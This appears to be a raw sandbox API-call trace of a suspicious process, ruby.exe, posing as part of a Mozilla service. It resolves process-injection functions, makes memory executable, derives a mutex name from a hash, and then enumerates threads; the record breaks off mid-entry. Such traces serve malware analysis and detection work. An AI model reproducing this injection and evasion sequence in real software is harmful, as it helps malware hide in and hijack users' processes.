[0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0170.571] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0170.571] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0170.571] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0170.572] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0170.572] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0170.572] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0170.572] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0170.572] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0170.572] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0170.578] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0170.578] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0170.579] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0170.583] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0170.583] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0170.583] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0170.583] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0170.583] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0170.583] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0170.583] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0170.583] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0170.583] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0170.584] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0170.584] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0170.584] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0170.586] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0170.586] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0170.586] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0170.587] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0170.587] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0170.587] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0170.587] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0170.588] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0170.588] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x232fe9c | out: lpflOldProtect=0x232fe9c*=0x40) returned 1 [0170.588] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x232fe9c | out: lpflOldProtect=0x232fe9c*=0x4) returned 1 [0170.589] VirtualQuery (in: lpAddress=0x80016, lpBuffer=0x232fe94, dwLength=0x1c | out: lpBuffer=0x232fe94*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0170.589] GetProcessHeap () returned 0x5d0000 [0170.589] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x364) returned 0x5f05a8 [0170.589] RtlMoveMemory (in: Destination=0x5f05a8, Source=0x80016, Length=0x363 | out: Destination=0x5f05a8) [0170.589] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0170.589] GetCurrentProcessId () returned 0x688 [0170.589] GetProcessHeap () returned 0x5d0000 [0170.589] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x105) returned 0x5f0918 [0170.589] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5f0918, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\ruby.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\ruby.exe")) returned 0x3b [0170.589] GetProcessHeap () returned 0x5d0000 [0170.589] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x105) returned 0x5f0a28 [0170.589] GetCurrentProcessId () returned 0x688 [0170.589] wsprintfA (in: param_1=0x5f0a28, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\ruby.exe37084212416723") returned 73 [0170.589] CryptAcquireContextA (in: phProv=0x232fe98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x232fe98*=0x5f0b78) returned 1 [0170.604] CryptCreateHash (in: hProv=0x5f0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x232fe9c | out: phHash=0x232fe9c) returned 1 [0170.604] lstrlenA (lpString="C:\\Program Files (x86)\\Mozilla Maintenance Service\\ruby.exe37084212416723") returned 73 [0170.604] CryptHashData (hHash=0x5f14a0, pbData=0x5f0a28, dwDataLen=0x49, dwFlags=0x0) returned 1 [0170.604] CryptGetHashParam (in: hHash=0x5f14a0, dwParam=0x2, pbData=0x232fe88, pdwDataLen=0x232fea0, dwFlags=0x0 | out: pbData=0x232fe88, pdwDataLen=0x232fea0) returned 1 [0170.604] wsprintfA (in: param_1=0x5f0a28, param_2="%02X" | out: param_1="89") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a2a, param_2="%02X" | out: param_1="FE") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a2c, param_2="%02X" | out: param_1="79") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a2e, param_2="%02X" | out: param_1="99") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a30, param_2="%02X" | out: param_1="C9") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a32, param_2="%02X" | out: param_1="69") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a34, param_2="%02X" | out: param_1="40") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a36, param_2="%02X" | out: param_1="F3") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a38, param_2="%02X" | out: param_1="99") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a3a, param_2="%02X" | out: param_1="FA") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a3c, param_2="%02X" | out: param_1="CB") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a3e, param_2="%02X" | out: param_1="FA") returned 2 [0170.604] wsprintfA (in: param_1=0x5f0a40, param_2="%02X" | out: param_1="C6") returned 2 [0170.605] wsprintfA (in: param_1=0x5f0a42, param_2="%02X" | out: param_1="01") returned 2 [0170.605] wsprintfA (in: param_1=0x5f0a44, param_2="%02X" | out: param_1="47") returned 2 [0170.605] wsprintfA (in: param_1=0x5f0a46, param_2="%02X" | out: param_1="EE") returned 2 [0170.605] CryptDestroyHash (hHash=0x5f14a0) returned 1 [0170.605] CryptReleaseContext (hProv=0x5f0b78, dwFlags=0x0) returned 1 [0170.605] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="89FE7999C96940F399FACBFAC60147EE") returned 0x80 [0170.605] GetLastError () returned 0x0 [0170.605] Sleep (dwMilliseconds=0x1f4) [0171.127] GetCurrentProcessId () returned 0x688 [0171.127] GetCurrentThreadId () returned 0xafc [0171.127] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0171.129] Thread32First (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.129] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.130] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.130] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.130] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.131] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.131] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.131] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.131] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.132] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.132] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.132] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.132] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.133] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.133] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.133] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.134] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.134] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.134] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.134] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.135] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.135] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.135] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.136] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.136] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.136] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.136] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.137] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.137] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.137] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.137] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.138] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.138] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.138] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.139] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.139] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.139] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.139] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.140] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.140] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.140] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.156] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.156] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.157] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.157] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.157] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.158] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.158] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.158] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.158] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.159] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.159] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.159] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.160] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.160] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.160] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.160] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.161] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.161] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.161] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.161] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.162] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.162] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.162] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.163] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.163] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.163] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.163] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.164] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.164] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.164] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.165] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.165] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.165] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.165] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.166] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.166] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.166] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.166] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.167] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.167] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.167] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.168] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.168] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.168] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.168] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.169] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.169] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.169] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.170] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.170] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.170] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.170] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.171] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.171] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.171] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.171] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.172] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.172] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.172] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.173] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.173] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.173] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.174] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.174] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.174] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.174] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.175] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.175] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.175] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.175] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.176] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.176] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.176] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.177] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.177] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.177] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.177] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.178] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.178] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.178] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.179] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.179] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.179] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.179] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.180] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.180] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.180] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.180] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.181] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.181] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.181] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.182] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.182] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.182] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.182] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.183] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.183] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.183] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.184] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.184] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.184] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.184] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.185] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.185] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.185] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.185] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.186] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.186] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.186] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.187] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.187] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.187] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.187] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.188] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.188] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.188] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.189] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.189] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.189] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.189] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.190] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.190] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.190] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.190] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.191] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.191] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.191] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.192] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.192] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.192] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.193] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.193] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.193] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.194] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.194] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.194] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.195] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.195] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.196] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.196] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.196] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.197] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.197] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.197] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.198] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.198] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.198] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.199] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.199] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.199] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.200] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.200] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.201] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.201] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.201] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.202] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.202] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.203] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.203] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.203] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.204] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.204] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.205] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.205] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.205] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.206] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.206] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.206] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.207] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.207] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.207] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.208] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.208] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.209] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.209] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.209] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.210] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.210] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.210] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.211] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.211] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.211] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.212] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.212] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.212] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.213] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.213] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.213] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.214] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.214] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.214] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.215] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.215] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.215] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.216] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.216] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.216] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.217] Thread32Next 